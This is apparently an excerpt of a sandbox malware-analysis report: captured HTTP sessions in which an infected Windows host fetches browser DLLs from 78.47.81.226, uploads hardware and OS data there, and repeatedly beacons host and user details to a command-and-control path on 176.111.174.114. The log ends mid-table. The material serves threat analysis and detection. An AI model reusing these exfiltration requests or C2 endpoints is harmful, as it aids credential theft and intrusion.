                                                                                                                                          Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                                                                                                          Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                                                                                                          Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                                                                                                          Host: 78.47.81.226
                                                                                                                                          Connection: Keep-Alive
Apr 28, 2021 22:58:43.190516949 CEST | 2270 | OUT | GET /nss3.dll HTTP/1.1
                                                                                                                                          Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                                                                                                          Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                                                                                                          Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                                                                                                          Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                                                                                                          Host: 78.47.81.226
                                                                                                                                          Connection: Keep-Alive
Apr 28, 2021 22:58:44.464139938 CEST | 3594 | OUT | GET /softokn3.dll HTTP/1.1
                                                                                                                                          Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                                                                                                          Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                                                                                                          Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                                                                                                          Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                                                                                                          Host: 78.47.81.226
                                                                                                                                          Connection: Keep-Alive
Apr 28, 2021 22:58:44.692892075 CEST | 3750 | OUT | GET /vcruntime140.dll HTTP/1.1
                                                                                                                                          Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                                                                                                          Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                                                                                                          Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                                                                                                          Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                                                                                                          Host: 78.47.81.226
                                                                                                                                          Connection: Keep-Alive
Apr 28, 2021 22:58:49.308279991 CEST | 3876 | OUT | POST / HTTP/1.1
                                                                                                                                          Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                                                                                                          Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                                                                                                          Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                                                                                                          Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                                                                                                          Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A
                                                                                                                                          Content-Length: 108331
                                                                                                                                          Host: 78.47.81.226
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Cache-Control: no-cache
Apr 28, 2021 22:58:49.308444977 CEST | 3891 | OUT |
Data Raw: 2d 2d 31 42 45 46 30 41 35 37 42 45 31 31 30 46 44 34 36 37 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 64 30 36 65 64 36 33 35 2d 36 38 66
Data Ascii: --1BEF0A57BE110FD467AContent-Disposition: form-data; name="hwid"d06ed635-68f6-4e9a-955c-90ce-806e6f6e6963--1BEF0A57BE110FD467AContent-Disposition: form-data; name="os"Windows 10 Pro--1BEF0A57BE110FD467AContent-Disposition: fo


| Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
| --- | --- | --- | --- | --- | --- |
| 1 | 78.47.81.226 | 80 | 192.168.2.4 | 49735 | C:\Users\user\Desktop\wKYTg7Gp6P.exe |

Timestamp | kBytes transferred | Direction | Data
Apr 28, 2021 22:58:42.247497082 CEST | 1278 | IN | HTTP/1.1 200 OK
                                                                                                                                          Server: nginx
                                                                                                                                          Date: Wed, 28 Apr 2021 20:58:42 GMT
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: keep-alive
                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                          Content-Encoding: gzip
Apr 28, 2021 22:58:42.323343992 CEST | 1281 | IN | HTTP/1.1 200 OK
                                                                                                                                          Server: nginx
                                                                                                                                          Date: Wed, 28 Apr 2021 20:58:42 GMT
                                                                                                                                          Content-Type: application/x-msdos-program
                                                                                                                                          Content-Length: 334288
                                                                                                                                          Connection: keep-alive
                                                                                                                                          Last-Modified: Wed, 14 Nov 2018 15:53:50 GMT
                                                                                                                                          ETag: "519d0-57aa1f0b0df80"
                                                                                                                                          Expires: Thu, 29 Apr 2021 20:58:42 GMT
                                                                                                                                          Cache-Control: max-age=86400
                                                                                                                                          X-Cache-Status: EXPIRED
                                                                                                                                          X-Cache-Status: HIT
                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                          Apr 28, 2021 22:58:42.774359941 CEST 1664 IN HTTP/1.1 200 OK
                                                                                                                                          Server: nginx
                                                                                                                                          Date: Wed, 28 Apr 2021 20:58:42 GMT
                                                                                                                                          Content-Type: application/x-msdos-program
                                                                                                                                          Content-Length: 137168
                                                                                                                                          Connection: keep-alive
                                                                                                                                          Last-Modified: Wed, 14 Nov 2018 15:53:50 GMT
                                                                                                                                          ETag: "217d0-57aa1f0b0df80"
                                                                                                                                          Expires: Thu, 29 Apr 2021 20:58:42 GMT
                                                                                                                                          Cache-Control: max-age=86400
                                                                                                                                          X-Cache-Status: EXPIRED
                                                                                                                                          X-Cache-Status: HIT
                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                          Apr 28, 2021 22:58:42.933749914 CEST 1808 IN HTTP/1.1 200 OK
                                                                                                                                          Server: nginx
                                                                                                                                          Date: Wed, 28 Apr 2021 20:58:42 GMT
                                                                                                                                          Content-Type: application/x-msdos-program
                                                                                                                                          Content-Length: 440120
                                                                                                                                          Connection: keep-alive
                                                                                                                                          Last-Modified: Wed, 14 Nov 2018 15:53:50 GMT
                                                                                                                                          ETag: "6b738-57aa1f0b0df80"
                                                                                                                                          Expires: Thu, 29 Apr 2021 20:58:42 GMT
                                                                                                                                          Cache-Control: max-age=86400
                                                                                                                                          X-Cache-Status: EXPIRED
                                                                                                                                          X-Cache-Status: HIT
                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                          Apr 28, 2021 22:58:43.260489941 CEST 2274 IN HTTP/1.1 200 OK
                                                                                                                                          Server: nginx
                                                                                                                                          Date: Wed, 28 Apr 2021 20:58:43 GMT
                                                                                                                                          Content-Type: application/x-msdos-program
                                                                                                                                          Content-Length: 1246160
                                                                                                                                          Connection: keep-alive
                                                                                                                                          Last-Modified: Wed, 14 Nov 2018 15:53:50 GMT
                                                                                                                                          ETag: "1303d0-57aa1f0b0df80"
                                                                                                                                          Expires: Thu, 29 Apr 2021 20:58:43 GMT
                                                                                                                                          Cache-Control: max-age=86400
                                                                                                                                          X-Cache-Status: EXPIRED
                                                                                                                                          X-Cache-Status: HIT
                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                          Apr 28, 2021 22:58:44.534013987 CEST 3599 IN HTTP/1.1 200 OK
                                                                                                                                          Server: nginx
                                                                                                                                          Date: Wed, 28 Apr 2021 20:58:44 GMT
                                                                                                                                          Content-Type: application/x-msdos-program
                                                                                                                                          Content-Length: 144848
                                                                                                                                          Connection: keep-alive
                                                                                                                                          Last-Modified: Wed, 14 Nov 2018 15:53:50 GMT
                                                                                                                                          ETag: "235d0-57aa1f0b0df80"
                                                                                                                                          Expires: Thu, 29 Apr 2021 20:58:44 GMT
                                                                                                                                          Cache-Control: max-age=86400
                                                                                                                                          X-Cache-Status: EXPIRED
                                                                                                                                          X-Cache-Status: HIT
                                                                                                                                          Accept-Ranges: bytes
Apr 28, 2021 22:58:44.762919903 CEST | 3751 | IN | HTTP/1.1 200 OK
                                                                                                                                          Server: nginx
                                                                                                                                          Date: Wed, 28 Apr 2021 20:58:44 GMT
                                                                                                                                          Content-Type: application/x-msdos-program
                                                                                                                                          Content-Length: 83784
                                                                                                                                          Connection: keep-alive
                                                                                                                                          Last-Modified: Wed, 14 Nov 2018 15:53:50 GMT
                                                                                                                                          ETag: "14748-57aa1f0b0df80"
                                                                                                                                          Expires: Thu, 29 Apr 2021 20:58:44 GMT
                                                                                                                                          Cache-Control: max-age=86400
                                                                                                                                          X-Cache-Status: EXPIRED
                                                                                                                                          X-Cache-Status: HIT
                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                          Data Ascii: MZ@!L!This program cannot be run in DOS mode.$NEEE"GL^NElUVA_D2DDRichEPEL8'Y"! @@A H?08@.text `.dataD@.idata@@.rsrc @@.reloc0@B
Apr 28, 2021 22:58:49.883857965 CEST | 3991 | IN | HTTP/1.1 200 OK
                                                                                                                                          Server: nginx
                                                                                                                                          Date: Wed, 28 Apr 2021 20:58:49 GMT
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: keep-alive
                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                          Content-Encoding: gzip
                                                                                                                                          Data Raw: 35 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 0d c9 4b 0a 80 30 0c 05 c0 13 d9 07 2e f5 34 92 3e a8 48 3f b4 69 8d b7 37 db 99 a4 da 0e 60 3e 8c 55 66 66 d1 ab 7f 41 6a c6 db 36 a9 45 5d a0 89 99 03 72 17 0e 7f d0 9c e3 12 d8 e8 6b 0f 34 9e 3f 58 f0 79 b5 48 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                                          Data Ascii: 54K0.4>H?i7`>UffAj6E]rk4?XyH0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
10 | 192.168.2.4 | 49753 | 176.111.174.114 | 80 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
Apr 28, 2021 22:59:10.858910084 CEST | 4525 | OUT | POST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
100 | 192.168.2.4 | 49800 | 176.111.174.114 | 80 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
Apr 28, 2021 22:59:25.792898893 CEST | 4809 | OUT | POST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
101 | 176.111.174.114 | 80 | 192.168.2.4 | 49800 | C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
Timestamp | kBytes transferred | Direction | Data
Apr 28, 2021 22:59:25.889651060 CEST | 4809 | IN | HTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:25 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
102 | 192.168.2.4 | 49801 | 176.111.174.114 | 80 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
Apr 28, 2021 22:59:26.093440056 CEST | 4810 | OUT | POST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
103 | 176.111.174.114 | 80 | 192.168.2.4 | 49801 | C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
Timestamp | kBytes transferred | Direction | Data
Apr 28, 2021 22:59:26.193414927 CEST | 4810 | IN | HTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:26 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
104 | 192.168.2.4 | 49802 | 176.111.174.114 | 80 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
Apr 28, 2021 22:59:26.413188934 CEST | 4811 | OUT | POST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
105 | 176.111.174.114 | 80 | 192.168.2.4 | 49802 | C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
Timestamp | kBytes transferred | Direction | Data
Apr 28, 2021 22:59:26.517174959 CEST | 4811 | IN | HTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:26 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
106 | 192.168.2.4 | 49803 | 176.111.174.114 | 80 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
Apr 28, 2021 22:59:26.724426985 CEST | 4812 | OUT | POST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
107 | 176.111.174.114 | 80 | 192.168.2.4 | 49803 | C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
Timestamp | kBytes transferred | Direction | Data
Apr 28, 2021 22:59:26.824716091 CEST | 4812 | IN | HTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:26 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
108 | 192.168.2.4 | 49804 | 176.111.174.114 | 80 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
Apr 28, 2021 22:59:27.032350063 CEST | 4813 | OUT | POST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
109 | 176.111.174.114 | 80 | 192.168.2.4 | 49804 | C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
Timestamp | kBytes transferred | Direction | Data
Apr 28, 2021 22:59:27.132389069 CEST | 4813 | IN | HTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:27 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
11 | 176.111.174.114 | 80 | 192.168.2.4 | 49753 | C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
Timestamp | kBytes transferred | Direction | Data
Apr 28, 2021 22:59:10.960712910 CEST | 4526 | IN | HTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:10 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                                          110 | 192.168.2.4 | 49805 | 176.111.174.114 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                                                                                          Apr 28, 2021 22:59:27.347110033 CEST | 4814 | OUT | POST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                                          111 | 176.111.174.114 | 80 | 192.168.2.4 | 49805 | C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                                                                                          Apr 28, 2021 22:59:27.449599028 CEST | 4814 | IN | HTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:27 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                                          112 | 192.168.2.4 | 49806 | 176.111.174.114 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                                                                                          Apr 28, 2021 22:59:27.655445099 CEST | 4815 | OUT | POST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                                          113 | 176.111.174.114 | 80 | 192.168.2.4 | 49806 | C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                                                                                          Apr 28, 2021 22:59:27.752365112 CEST | 4815 | IN | HTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:27 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                                          114 | 192.168.2.4 | 49807 | 176.111.174.114 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                                                                                          Apr 28, 2021 22:59:27.967936993 CEST | 4816 | OUT | POST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                                          115 | 176.111.174.114 | 80 | 192.168.2.4 | 49807 | C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                                                                                          Apr 28, 2021 22:59:28.067342997 CEST | 4816 | IN | HTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:28 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                                          116 | 192.168.2.4 | 49808 | 176.111.174.114 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                                                                                          Apr 28, 2021 22:59:28.278501034 CEST | 4817 | OUT | POST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                                          117 | 176.111.174.114 | 80 | 192.168.2.4 | 49808 | C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                                                                                          Apr 28, 2021 22:59:28.376502037 CEST | 4817 | IN | HTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:28 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                                          118 | 192.168.2.4 | 49809 | 176.111.174.114 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                                                                                          Apr 28, 2021 22:59:28.580667973 CEST | 4818 | OUT | POST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
